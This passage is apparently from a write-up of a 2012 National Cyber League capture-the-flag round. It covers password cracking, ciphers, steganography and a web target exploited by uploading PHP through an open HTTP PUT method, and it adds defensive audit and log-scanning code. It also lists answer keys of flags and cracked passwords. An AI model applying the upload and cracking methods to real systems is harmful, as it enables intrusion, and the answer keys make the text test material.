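A report built on `summarize` tells the client which policy rule (minimum length, dictionary check, banned patterns) would have blocked most of the recovered passwords, which is the actionable output of a cracking exercise.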
D. Windows Passwords
For the Windows Passwords the participant was provided with a dump of all of the Windows hashes from the system. The player then simply needed to crack the provided password hashes and submit the cracked passwords as the flags.
All of the passwords were hashed using the LANMAN hash, a weak hashing system commonly found on older Windows based systems (though still found today for backwards compatibility). LANMAN actually splits all passwords into seven-character sets before hashing them, and ignores case sensitivity entirely. Because of these factors, brute forcing or dictionary testing LANMAN hashes is fast, efficient, and effective.
Again, a simple password-cracking tool like John The Ripper was efficient at breaking the passwords. Due to the weak cryptographic hashing algorithm used, password complexity is an almost entirely moot subject.
Flag Questions | Flag Answers
What is the plaintext password for John Smith's account? | password
What is the plaintext password for James Johnson's account? | turtles
What is the plaintext password for Emily Miller's account? | rainbows
What is the plaintext password for Tom Anderson's account? | oracle
What is the plaintext password for Amanda Williams's account? | 123456
What is the plaintext password for Michael Davis's account? | greenday
What is the plaintext password for Daniel Jameson's account? | iforget
What is the plaintext password for Kim Jones's account? | Ready2go
What is the plaintext password for Brandon Davidson's account? | Pass4you
What is the plaintext password for Aaron Brown's account? | car2truck
What is the plaintext password for the attacker's account (nsanders)? | nCL-k!Su-8930
What is the plaintext password for the Administrator account? | nCL-PC8?-3891
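The structural weakness just described is visible in a hash dump without cracking anything: a LANMAN hash is two independent DES blocks, and the block for an empty seven-character half is a fixed constant (aad3b435b51404ee), so an account whose second half equals that constant has a password of at most seven characters. The auditor below is an added example, not part of the challenge material; the pwdump-style lines are constructed with placeholder NT hashes, and the function names are mine. It flags accounts that still store an LM hash at all, accounts whose LM second half betrays a short password, and accounts whose NT hash is that of the empty string.

```python
"""Audit a pwdump-style hash dump for LANMAN exposure.

Added example, not part of the challenge material; the dump lines are
constructed and their NT hashes are placeholders.
"""

# LM hash of an empty (or absent) password: DES of the fixed "KGS!@#$%"
# block under an all-zero 7-byte key, once for each half.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
# NT hash (MD4 of the UTF-16LE password) of the empty string.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def parse_pwdump_line(line):
    """user:rid:lmhash:nthash::: -> dict, or None for malformed lines."""
    parts = line.strip().split(":")
    if len(parts) < 4:
        return None
    return {"user": parts[0], "rid": parts[1],
            "lm": parts[2].lower(), "nt": parts[3].lower()}


def assess(entry):
    """Return the list of findings for one parsed account entry."""
    findings = []
    lm, nt = entry["lm"], entry["nt"]
    if lm not in ("", EMPTY_LM):
        findings.append("lm-hash-stored")
        # Second half equal to the empty-half constant: the password fits
        # in the first 7 characters, so only one DES block needs guessing.
        if lm[16:] == EMPTY_LM_HALF:
            findings.append("password-le-7-chars")
    if nt == EMPTY_NT:
        findings.append("empty-password")
    return findings


def audit_pwdump(text):
    """Map each user in the dump to its findings (empty list = nothing)."""
    report = {}
    for line in text.splitlines():
        entry = parse_pwdump_line(line)
        if entry:
            report[entry["user"]] = assess(entry)
    return report


# Constructed sample dump (not the challenge file); NT hashes are placeholders.
SAMPLE_DUMP = """\
Administrator:500:0123456789abcdef0123456789abcdef:00112233445566778899aabbccddeeff:::
jsmith:1001:0123456789abcdefaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

if __name__ == "__main__":
    for user, findings in audit_pwdump(SAMPLE_DUMP).items():
        print("%-14s %s" % (user, ", ".join(findings) or "ok"))
```

The fix this audit points at is the Windows policy "Network security: Do not store LAN Manager hash value on next password change" together with a forced password rotation, after which every LM field should read aad3b435b51404eeaad3b435b51404ee.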
E. Basic Cryptography
For each Basic Cryptography challenge the player was provided with a file containing nothing more than an encrypted string.
The string is encrypted using the Atbash cipher, a substitution cipher using a reversed alphabet.
The decrypted string:
Another one bites the dust, you've now found three flags for the Basic Cryptography challenge, the flag is: NCL-SGOS-7428
Encrypted by taking the string, converting it to Morse code, and converting the Morse code tones to ASCII.
The decrypted string:
Okay, now this one is just too easy, the flag is: nCL-lAPu-3403
5. Challenge Five
The encrypted string:
O,iLimt tleeseYrexefsCta lg nl !hliNK-5ky hsFA siprat-i ilb sda h E o h etsto ai rporpycalne. o' oei: Tefa s C-UN82at G on w u tKftn BcyghhesDtst g:LM0
The string is encrypted with the Rail Fence cipher, using the standard three rails.
The decrypted string:
Okay, this FLAG is important - it will be used as the KEY for the next set of Basic Cryptography challenges. Don't lose it:! The flag is: NCL-KUMN-8025
As the decrypted string states, this flag is particularly important. As most cryptography systems require a key, or a shared secret, it is imperative that the player uncovers the key. It is this flag value that will be used as the key, and therefore be required, by most of the following flags.
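The two classical ciphers met so far, Atbash (a fixed substitution) and the Rail Fence (a zigzag transposition), are worth having as code, because the decryption of a transposition is the part people get wrong: the ciphertext is the rails read out top to bottom, so the decrypter must first work out how many characters land on each rail. The block below is an added example, not the challenge's tooling; `rail_pattern`, `rail_fence_encrypt`, `rail_fence_decrypt` and `atbash` are my names. It uses the decrypted text of Challenge Five from the write-up as a known plaintext and checks that re-encrypting it reproduces the opening of the ciphertext shown above; it also handles any rail count, not just the three used here.

```python
"""Rail fence (zigzag) transposition for any number of rails, plus Atbash.

Added example, not part of the challenge material. PLAINTEXT is the
decrypted Challenge Five string quoted in the write-up.
"""


def rail_pattern(length, rails):
    """Rail index for each position: 0,1,..,rails-1,rails-2,..,1,0,1,..."""
    if rails < 2:
        return [0] * length
    cycle = 2 * (rails - 1)
    return [min(i % cycle, cycle - i % cycle) for i in range(length)]


def rail_fence_encrypt(text, rails):
    """Write the text along the zigzag, then read each rail left to right."""
    rows = [[] for _ in range(max(rails, 1))]
    for ch, r in zip(text, rail_pattern(len(text), rails)):
        rows[r].append(ch)
    return "".join("".join(row) for row in rows)


def rail_fence_decrypt(cipher, rails):
    """Slice the ciphertext into rails of the right lengths, then walk the
    zigzag pattern taking the next unused character from each rail."""
    pattern = rail_pattern(len(cipher), rails)
    counts = [pattern.count(r) for r in range(max(rails, 1))]
    rows, pos = [], 0
    for n in counts:
        rows.append(list(cipher[pos:pos + n]))
        pos += n
    idx = [0] * len(rows)
    out = []
    for r in pattern:
        out.append(rows[r][idx[r]])
        idx[r] += 1
    return "".join(out)


def atbash(text):
    """Atbash mirrors each letter in its alphabet (a<->z, b<->y, ...);
    non-letters pass through. Encrypting twice restores the input."""
    out = []
    for ch in text:
        if "a" <= ch <= "z":
            out.append(chr(ord("a") + ord("z") - ord(ch)))
        elif "A" <= ch <= "Z":
            out.append(chr(ord("A") + ord("Z") - ord(ch)))
        else:
            out.append(ch)
    return "".join(out)


# Challenge Five plaintext as given in the write-up.
PLAINTEXT = ("Okay, this FLAG is important - it will be used as the KEY for "
             "the next set of Basic Cryptography challenges. Don't lose it:! "
             "The flag is: NCL-KUMN-8025")

if __name__ == "__main__":
    c = rail_fence_encrypt(PLAINTEXT, 3)
    print(c[:24])                      # begins "O,iLimt tleeseYrexefsCta"
    print(rail_fence_decrypt(c, 3) == PLAINTEXT)
    print(atbash("Another one bites the dust"))
```

Because the rail count is the only secret and is small, a decrypter that loops `rails` from 2 upward and scores the output for English letter frequencies recovers such a message without any key material, which is why transpositions of this kind belong in puzzles rather than in products.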
6. Challenge Six
The encrypted string:
AJNG! Nijsbuq mgna kulqyosuk. Jigy mjtq hjqu sj aj. Sbu mgna dr ILG-UAWB-3472
This time the string is encrypted with a Caesar cipher; however, it is a keyed Caesar cipher and therefore requires the previous flag answer as the key.
Key:
NCL-KUMN-8025
The decrypted string:
GOAL! Another flag decrypted. Only four more to go. The flag is NCL-EGWH-3472
For this puzzle no key was required, at least not in the traditional understanding of the term key. The string is encrypted with the Scytale tool, often referred to as a skip transposition cipher.
Although no key is required, a shared secret is needed: the number to use for the skip. In this case the number is simply the "flag" number: 7.
The decrypted string:
Hopefully that was a bit harder? What? It wasn't? The flag is: NCL-SDGK-8329
8. Challenge Eight
The encrypted string:
i atnheI ts -itsTn Z e rso C8 ' uoon,t-ebroh2:e hutimfnnI3HN Dayga7 Es oe'vFfeghLlh g
This string was encrypted with the Übchi, a German WWI double columnar transposition cipher.
Key:
NCL-KUMN-8025
The decrypted string:
I have to be honest, I'm running out of things to say here' The flag is: NCL-DFHE-2378
In this case the cipher text is an ASCII-armored AES-256-ECB encrypted string.
Key:
NCL-KUMN-8025
The decrypted string:
Great Job! You did it, you got the final Basic Cryptography challenge flag. This was certainly a lot harder than the rest. But the points will be worth your effort. Good luck on the rest of the game. The flag is: nCL-k?l8-9033
F. Advanced Cryptography
There were four flags for the Advanced Cryptography section. The focus of the Advanced Cryptography was specifically asymmetric encryption and, further, the practical implementation and usage of public key cryptography.
1. Puzzles One, Two, and Three
For the first three Advanced Cryptography puzzles the player was provided an archive containing six (6) files: the public key, a corresponding private key, a text file containing the key's passphrase, and three encrypted "flag" files.
The player only needed to import the GPG keypair into their keychain and decrypt each flag.
Flag Questions | Flag Answers
What is the first Advanced Cryptography flag? | nCL-!kC8-8972
What is the second Advanced Cryptography flag? | nCL-xCCl-3487
What is the third Advanced Cryptography flag? | nCL-nuSv-6482
2. Puzzles Four and Five
The last two Advanced Cryptography puzzles require the participant to brute-force the passphrase on a GPG key, and then utilize the key to decrypt a flag file. All three files (encrypted flag, public key, and private key) are provided.
There are various tools publicly available to brute-force GPG keys. The popular John The Ripper tool has a "Jumbo" version, which includes the ability to break PGP/GPG keys.
The participant can narrow their search range using a customized dictionary or ruleset detailing the known NCL flag format. With 466,976 possible passphrase combinations this brute-force will be time intensive, but it's more than breakable.
Flag Questions | Flag Answers
What is the passphrase for the key-pair? | nCL-lSkM-7382
Using the previous key-pair, what is the fifth Advanced Cryptography flag? | nCL-!PWk-3387
G. Steganography
There were a total of seven (7) Steganography challenges in the third NCL round.
1. First Puzzle
The first Steganography puzzle is simple, containing the flag in the image's metadata, easily obtainable from the file properties or even simply by passing the image file through the strings utility.
Flag:
NCL-LBJV-5397
2. Second Puzzle
The second Steganography puzzle is less trivial. The image appears as if it were completely blank, purely white. Attempts to find the flag within the metadata would be frivolous, as it is much more simple than that.
This image actually contains the flag in white text, which is sitting against a white background. Inspection of the image will reveal that the background is 255/255/255 (RGB) and certain portions (the text) are 253/253/253 (RGB).
A quick and easy method of retrieving this flag is to use the Magic Lasso tool found in image editing software (like GIMP or Photoshop). The Magic Lasso will select the text, allowing the player to alter the color of only the text, revealing the flag.
Flag
NCL-JKTY-8343
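What the lasso tool does by hand (select everything that is not the background colour and recolour it) is a two-line pixel operation, and doing it in code also gives a quick test for whether an apparently blank image is actually uniform. The block below is an added example, not part of the challenge material: it works on a constructed in-memory pixel grid so it needs no image library, and `dominant_colour`, `colour_range`, `mask_non_background` and `render` are my names. A 253/253/253 letter on a 255/255/255 background, as in this puzzle, shows up as a non-zero colour range and as a mask the analyst can print.

```python
"""Reveal low-contrast content (such as 253/253/253 text on a 255/255/255
background) by masking every pixel that differs from the dominant colour.

Added example, not from the challenge material; it runs on a constructed
pixel grid (list of rows of (r, g, b) tuples) so no image library is needed.
"""
from collections import Counter


def dominant_colour(pixels):
    """Most frequent (r, g, b) tuple; for a near-blank image, the background."""
    return Counter(px for row in pixels for px in row).most_common(1)[0][0]


def colour_range(pixels):
    """(min, max) over all channel values; a range of 0 means truly uniform."""
    values = [c for row in pixels for px in row for c in px]
    return min(values), max(values)


def mask_non_background(pixels, tolerance=0):
    """1 where a pixel differs from the background by more than `tolerance`
    in any channel, else 0. tolerance=0 catches the 253 vs 255 case."""
    bg = dominant_colour(pixels)
    return [[1 if any(abs(c - b) > tolerance for c, b in zip(px, bg)) else 0
             for px in row] for row in pixels]


def render(mask, on="#", off="."):
    """ASCII rendering of the mask, one text line per pixel row."""
    return "\n".join("".join(on if v else off for v in row) for row in mask)


def constructed_image():
    """Constructed 7x5 sample: white background with a faint 'L' drawn in
    253/253/253, mimicking the puzzle's white-on-white text."""
    white, faint = (255, 255, 255), (253, 253, 253)
    grid = [[white] * 7 for _ in range(5)]
    for y in range(5):
        grid[y][1] = faint
    for x in range(1, 5):
        grid[4][x] = faint
    return grid


if __name__ == "__main__":
    img = constructed_image()
    print("background:", dominant_colour(img), "range:", colour_range(img))
    print(render(mask_non_background(img)))
```

With a real file the same functions apply to the pixel rows returned by any image library; the `tolerance` argument is what separates genuine hidden content from JPEG compression noise, which varies by a few units across the whole image rather than in letter-shaped regions.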
3. Third Puzzle
This image contains another file, embedded using the BattleSteg algorithm. Using a tool like Digital Invisible Ink the contestant could easily extract the embedded file, which simply contains the flag value.
Flag
NCL-OCKM-4576
4. Fourth Puzzle
This image contains another file, embedded using the BlindHide algorithm. Again using Digital Invisible Ink the player can easily extract the embedded file, which simply contains the flag value.
Flag
NCL-KGGS-6551
5. Fifth Puzzle
This image contains another file, embedded using the HideSeek algorithm.
Unlike the previous algorithms, HideSeek requires a password. In this case the password "NCL" was used. Digital Invisible Ink can easily extract the embedded file, which simply contains the flag value.
Flag
NCL-VHGD-6581
6. Sixth Puzzle
This image contains another file, embedded using the DynamicBattleSteg algorithm.
DynamicBattleSteg requires a password. In this case the password "NCL" was used. Digital Invisible Ink can easily extract the embedded file, which simply contains the flag value.
Flag
NCL-GRBS-4237
7. Seventh Puzzle
The seventh and final Steganography puzzle, and the last flag for Round 3 of the NCL, is by far the most complex.
The player is provided with an archive containing 26 files, named with "SC7-" and then a single character, "A" through "Z."
Running the file utility against all of the files will show that the files are actually portions of a split JPEG file. This will also reveal that the first piece of the image is actually the part labeled "A." Reviewing the file sizes will indicate that the portion labeled "Z" is the last section of the image.
file *
SC7-A: PC bitmap, Windows 3.x format, 1024 x 857 x 24
SC7-B: data
SC7-C: data
SC7-D: data
SC7-E: ERROR: line 22: regexec error 17, (illegal byte sequence)
SC7-F: data
SC7-G: data
SC7-H: data
SC7-I: data
SC7-J: data
SC7-K: data
SC7-L: data
SC7-M: data
SC7-N: data
SC7-O: data
SC7-P: data
SC7-Q: data
SC7-R: data
SC7-S: data
SC7-T: data
SC7-U: data
SC7-V: data
SC7-W: data
SC7-X: data
SC7-Y: data
SC7-Z: data
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-A
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-B
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-C
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-D
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-E
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-F
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-G
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-H
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-I
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-J
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-K
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-L
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-M
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-N
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-O
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-P
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Q
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-R
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-S
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-T
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-U
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-V
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-W
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-X
-rw-r--r-- 1 user group 102400 Sep 29 17:10 SC7-Y
-rw-r--r-- 1 user group 72758 Sep 29 17:10 SC7-Z
At this point the participant likely believes the files simply need to be concatenated in alphabetical order. But this will result in a broken image.
The broken image does begin to illustrate what the end image should look like, assisting the contestant with future spot-checks of their concatenated orderings.
One solution to finding the proper ordering is trial and error; another is scripting, enumerating through all of the possible combinations.
The ordering, however, is actually logical, and not random.
Files "A" through "M" are the even numbered files.
Files "N" through "Z" are the odd numbered files.
A = Part 0
B = Part 2
C = Part 4
D = Part 6
E = Part 8
F = Part 10
G = Part 12
H = Part 14
I = Part 16
J = Part 18
K = Part 20
L = Part 22
M = Part 24
N = Part 1
O = Part 3
P = Part 5
Q = Part 7
R = Part 9
S = Part 11
T = Part 13
U = Part 15
V = Part 17
W = Part 19
X = Part 21
Y = Part 23
Z = Part 25
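The interleaving above is a closed-form mapping rather than something to enumerate, and writing it down also gives a way to sanity-check a candidate ordering by looking at the leading bytes of the result. The block below is an added example, not the challenge's own script: `part_index`, `ordered_names`, `reassemble`, `split_for_demo` and `detect_header` are my names, and the byte blob it splits and rejoins is constructed. It maps A..M to parts 0,2,..,24 and N..Z to parts 1,3,..,25, concatenates the pieces in that order, and recognises the BMP and JPEG magic bytes that the `file` output and the write-up respectively mention.

```python
"""Reassemble the 26 "SC7-A".."SC7-Z" pieces in the interleaved order the
write-up describes: A..M hold parts 0,2,..,24 and N..Z hold parts 1,3,..,25.

Added example, not the challenge's own script; the byte blob is constructed.
"""
import string

LETTERS = string.ascii_uppercase


def part_index(letter):
    """Map a piece letter to the position its contents occupy in the file."""
    i = LETTERS.index(letter)
    return 2 * i if i < 13 else 2 * (i - 13) + 1


def ordered_names(prefix="SC7-"):
    """Piece names sorted by the position their contents occupy."""
    return [prefix + letter for letter in sorted(LETTERS, key=part_index)]


def reassemble(pieces, prefix="SC7-"):
    """pieces: {name: bytes}. Returns the concatenated original file."""
    return b"".join(pieces[name] for name in ordered_names(prefix))


def detect_header(blob):
    """Recognise the magic bytes of the two formats mentioned for this
    puzzle, as a quick check that a candidate ordering starts correctly."""
    if blob[:2] == b"BM":
        return "bmp"
    if blob[:3] == b"\xff\xd8\xff":
        return "jpeg"
    return "unknown"


def split_for_demo(data, chunk=4):
    """Constructed demo: cut `data` into 26 chunks and label them the way
    the challenge did (even parts -> A..M, odd parts -> N..Z)."""
    parts = [data[i * chunk:(i + 1) * chunk] for i in range(26)]
    return {"SC7-" + letter: parts[part_index(letter)] for letter in LETTERS}


if __name__ == "__main__":
    # Constructed 104-byte blob standing in for the split image.
    original = b"BM" + bytes(range(102))
    pieces = split_for_demo(original)
    alphabetical = b"".join(pieces["SC7-" + letter] for letter in LETTERS)
    print("alphabetical order intact:", alphabetical == original)
    print("interleaved order intact: ", reassemble(pieces) == original)
    print("header:", detect_header(reassemble(pieces)))
```

To apply it to files on disk, read each `SC7-?` into the dictionary with `open(name, "rb").read()` and write the result of `reassemble` back out; both orderings start with the same header bytes (piece A is part 0 either way), so a header check alone cannot distinguish them, which is why the write-up's spot-check of the rendered image is still needed.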
Now that the participant has the image put back together, there is still the matter of the embedded file. That's right, this challenge is not over yet.
Just like all of the previous Steganography puzzles, this one also has a hidden flag within.
This picture of a puzzle has another file embedded within using the DynamicBattleSteg algorithm, again using "NCL" as the password. The embedded file is actually another white-text on white-background image.
Flag
NCL-KLMG-8245
V. NCL Championship
The 2012 Championship for the National Cyber League invited the top ten players from each conference over the course of the previous three rounds.
This final championship round included all of the challenges that were not solved during the previous rounds.
In addition to the previous puzzles, two new challenges were introduced within the Web Exploitation and Network Data Analysis sections.
A. Flags
Name | Server | Value
What is the MD5 flag found on Target 1? | 54.243.211.149 (Web Exploitation - Target 1) | 2500
What is the MD5 flag found on Target 2? | 184.72.228.85 (Web Exploitation - Target 2) | 5000
What is the first flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1000
What is the second flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1000
What is the third flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1000
What is the fourth flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1200
What is the fifth flag found on Target 3? | 184.72.228.91 (Web Exploitation - Target 3) | 1300
What snort SID fired on traffic at 05/29-14:44:02.433544? | 127.0.0.4 (Network Data Analysis) | 500
What is the IP address of the attacker? | 127.0.0.4 (Network Data Analysis) | 500
What service is the victim running? (Vendor Product) | 127.0.0.4 (Network Data Analysis) | 500
What URI was the attacker attempting to access? | 127.0.0.4 (Network Data Analysis) | 1000
What CVE is being exploited? | 127.0.0.4 (Network Data Analysis) | 5000
What is the plaintext password for John Smith's account? | 127.0.0.5 (Linux Passwords) | 1000
What is the plaintext password for the attacker's account (jbowers)? | 127.0.0.5 (Linux Passwords) | 2500
What is the plaintext password for the root account? | 127.0.0.5 (Linux Passwords) | 2500
What is the flag for the fifth Basic Cryptography puzzle? | 127.0.0.6 (Basic Cryptography) | 300
What is the flag for the eighth Basic Cryptography puzzle? | 127.0.0.6 (Basic Cryptography) | 700
What is the flag for the ninth Basic Cryptography puzzle? | 127.0.0.6 (Basic Cryptography) | 900
What is the passphrase for the key-pair? | 127.0.0.7 (Advanced Cryptography) | 5000
Using the previous key-pair, what is the fifth Advanced Cryptography flag? | 127.0.0.7 (Advanced Cryptography) | 5000
What is the flag found in the third Steganography challenge? | 127.0.0.8 (Steganography) | 300
What is the flag found in the fourth Steganography challenge? | 127.0.0.8 (Steganography) | 300
What is the flag found in the fifth Steganography challenge? | 127.0.0.8 (Steganography) | 500
What is the flag found in the sixth Steganography challenge? | 127.0.0.8 (Steganography) | 500
What is the flag found in the seventh Steganography challenge? | 127.0.0.8 (Steganography) | 5000
B. Network Data Analysis
Just like the previous Network Data Analysis, the player simply needed to analyze the traffic with a traffic analyzer; however, this time additional analysis and research needed to be performed on the findings.
Flag Questions | Flag Answers
What snort SID fired on traffic at 05/29-14:44:02.433544? | 2464
What is the IP address of the attacker? | 172.16.4.117
What service is the victim running? (Vendor Product) | Apache Tomcat
What URI was the attacker attempting to access? | /webdav/examples/SendMailServlet
What CVE is being exploited? | CVE-2007-3383
C. Web Exploitation - Target Three
This Web Application simply displays a directory listing.
Navigating to the "flag_01.php" file simply displays an error message:
Try Again
Going to "put.php" returns a 405 HTTP Error (Method Not Allowed) and provides a textual error:
Error: Invalid Method
Knowing the fundamentals of HTTP, the error message and file name should have provided ample hints, but if those failed most web vulnerability scanners (like Nikto) would also uncover the fact that the web server accepts PUT requests, allowing an attacker to upload files to the web server unrestricted.
Under normal circumstances the attacker could manually launch the PUT request utilizing a socket tool like netcat; in this case further steps must be taken as HTTPS is in use. Therefore the participant will need to use another tool or method to execute the HTTP PUT request against the server.
One such useful tool is the Poster Firefox Add-On. Poster allows the user to manipulate HTTP requests as needed and allows common and custom HTTP Request Methods.
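The condition this target depends on, a web server that accepts PUT for arbitrary paths, leaves a clear trace in the access log, and the same log is where a defender confirms the method allowlist actually took effect. The scanner below is an added example, not part of the challenge or its tooling: `parse`, `findings_for` and `scan` are my names, and the Combined Log Format lines are constructed to mirror this scenario (a 405 probe, then an accepted PUT of a PHP file). It flags any method outside a small allowlist, notes when a write method was answered with a 2xx status (the server really accepted it), and separately marks attempts to upload executable extensions.

```python
"""Spot unexpected HTTP methods, and accepted PUT uploads in particular,
in a web server access log.

Added example, not part of the challenge; the Combined Log Format lines are
constructed.
"""
import re

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Methods a static-content or PHP site normally needs. Anything else
# (PUT, DELETE, MOVE, PROPFIND, ...) should be denied and alerted on.
ALLOWED_METHODS = {"GET", "HEAD", "POST", "OPTIONS"}
WRITE_METHODS = {"PUT", "MOVE", "COPY"}
EXECUTABLE_EXT = re.compile(r"\.(php\d?|phtml|jsp|asp|aspx|cgi|pl)$", re.I)


def parse(line):
    """Combined Log Format line -> dict of fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def findings_for(entry):
    """List the reasons one request deserves attention (empty = none)."""
    f = []
    if entry["method"] not in ALLOWED_METHODS:
        f.append("unexpected-method:" + entry["method"])
        # A 2xx answer to a write method means the server accepted the write.
        if entry["method"] in WRITE_METHODS and entry["status"].startswith("2"):
            f.append("write-accepted")
    if entry["method"] in WRITE_METHODS and EXECUTABLE_EXT.search(entry["path"]):
        f.append("executable-upload-attempt")
    return f


def scan(log_text):
    """Return (ip, method, path, status, findings) for each suspicious line."""
    out = []
    for line in log_text.splitlines():
        entry = parse(line)
        if not entry:
            continue
        findings = findings_for(entry)
        if findings:
            out.append((entry["ip"], entry["method"], entry["path"],
                        entry["status"], findings))
    return out


# Constructed sample log; addresses are from documentation ranges.
SAMPLE_LOG = """\
203.0.113.5 - - [20/Dec/2012:15:20:01 +0000] "GET /put.php HTTP/1.1" 405 28 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Dec/2012:15:20:09 +0000] "OPTIONS / HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Dec/2012:15:21:44 +0000] "PUT /upload.php HTTP/1.1" 201 0 "-" "Mozilla/5.0"
203.0.113.5 - - [20/Dec/2012:15:21:50 +0000] "GET /upload.php HTTP/1.1" 200 212 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Dec/2012:15:22:03 +0000] "PUT /notes.txt HTTP/1.1" 403 199 "-" "curl/7.26.0"
"""

if __name__ == "__main__":
    for ip, method, path, status, findings in scan(SAMPLE_LOG):
        print(ip, method, path, status, ", ".join(findings))
```

The server-side counterpart is to deny every method outside the allowlist at the web server (for Apache, a `<LimitExcept GET POST HEAD>` block with `Require all denied`) and to keep document roots non-writable by the service account, so that even a misconfigured method cannot create an executable file.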
The player is able to clearly confirm they have the ability to upload and execute PHP code.
At this point the player needs to upload a set of PHP instructions that will allow them to read the contents of flag_01.php.
Looking at the source of the returned page will reveal the first flag.
<? echo "Try Again"; // NCL-JOFW-9345 ?>
Now the contestant needs to find four other flags, but there aren't any hints to indicate where the flags may be. Searches of the web directories will show that there are no flags there. A simple find or locate should do the trick. The locate Linux utility is great at quickly finding files that contain a particular name and, based on the initial flag's file name, it's a wise idea to search for the term "flag."
Returning:
Flag02: NCL-ONGD-0832
Flag03: NCL-HSFH-8943
The fourth and fifth flags have a familiar extension, ASC being ASCII armored encrypted output from GPG. In fact it seems there is a binary version of the same file ending in GPG. This will not be as simple as outputting the file. A quick listing of the root level directory contents will surely reveal some useful information.
total 116
drwxr-xr-x 23 root root 4096 Nov 23 18:41 .
drwxr-xr-x 23 root root 4096 Nov 23 18:41 ..
drwxr-xr-x 2 root root 4096 Oct 12 16:46 bin
drwxr-xr-x 3 root root 4096 Oct 12 16:48 boot
drwxr-xr-x 12 root root 3880 Dec 20 06:35 dev
drwxr-xr-x 89 root root 4096 Dec 20 06:35 etc
-rw-r--r-- 1 root root 580 Nov 23 18:40 flag_04.txt.asc
-rw-r--r-- 1 root root 357 Nov 23 18:39 flag_04.txt.gpg
-rw-r--r-- 1 root root 742 Nov 23 18:41 flag_05.tgz.asc
-rw-r--r-- 1 root root 476 Nov 23 18:41 flag_05.tgz.gpg
-rw-r--r-- 1 root root 3501 Nov 23 18:38 gpg.key
drwxr-xr-x 3 root root 4096 Apr 24 2012 home
lrwxrwxrwx 1 root root 33 Apr 24 2012 initrd.img
drwxr-xr-x 18 root root 4096 Oct 12 16:46 lib
drwxr-xr-x 2 root root 4096 Oct 12 16:45 lib64
drwx------ 2 root root 16384 Apr 24 2012 lost+found
drwxr-xr-x 2 root root 4096 Apr 24 2012 media
drwxr-xr-x 3 root root 4096 Oct 17 11:40 mnt
drwxr-xr-x 2 root root 4096 Apr 24 2012 opt
dr-xr-xr-x 81 root root 0 Dec 20 06:33 proc
-rw-r--r-- 1 root root 4941 Nov 23 18:38 pub.key
drwx------ 4 root root 4096 Dec 1 21:46 root
drwxr-xr-x 16 root root 600 Dec 20 15:18 run
drwxr-xr-x 2 root root 4096 Oct 12 16:47 sbin
drwxr-xr-x 2 root root 4096 Mar 5 2012 selinux
drwxr-xr-x 2 root root 4096 Apr 24 2012 srv
drwxr-xr-x 13 root root 0 Dec 20 06:33 sys
drwxrwxrwt 2 root root 4096 Dec 20 15:17 tmp
drwxr-xr-x 10 root root 4096 Apr 24 2012 usr
drwxr-xr-x 13 root root 4096 Dec 1 22:00 var
lrwxrwxrwx 1 root root 29 Apr 24 2012 vmlinuz
The contestant should hopefully notice the two GPG related files, gpg.key and pub.key. At that point the player can download and import the keys (which have no passphrase), decrypting the fourth and fifth flags.
Flag Questions | Flag Answers
What is the fourth flag found on Target 3? | nCL-nlu!-4726
What is the fifth flag found on Target 3? | nCL-LCnk-4237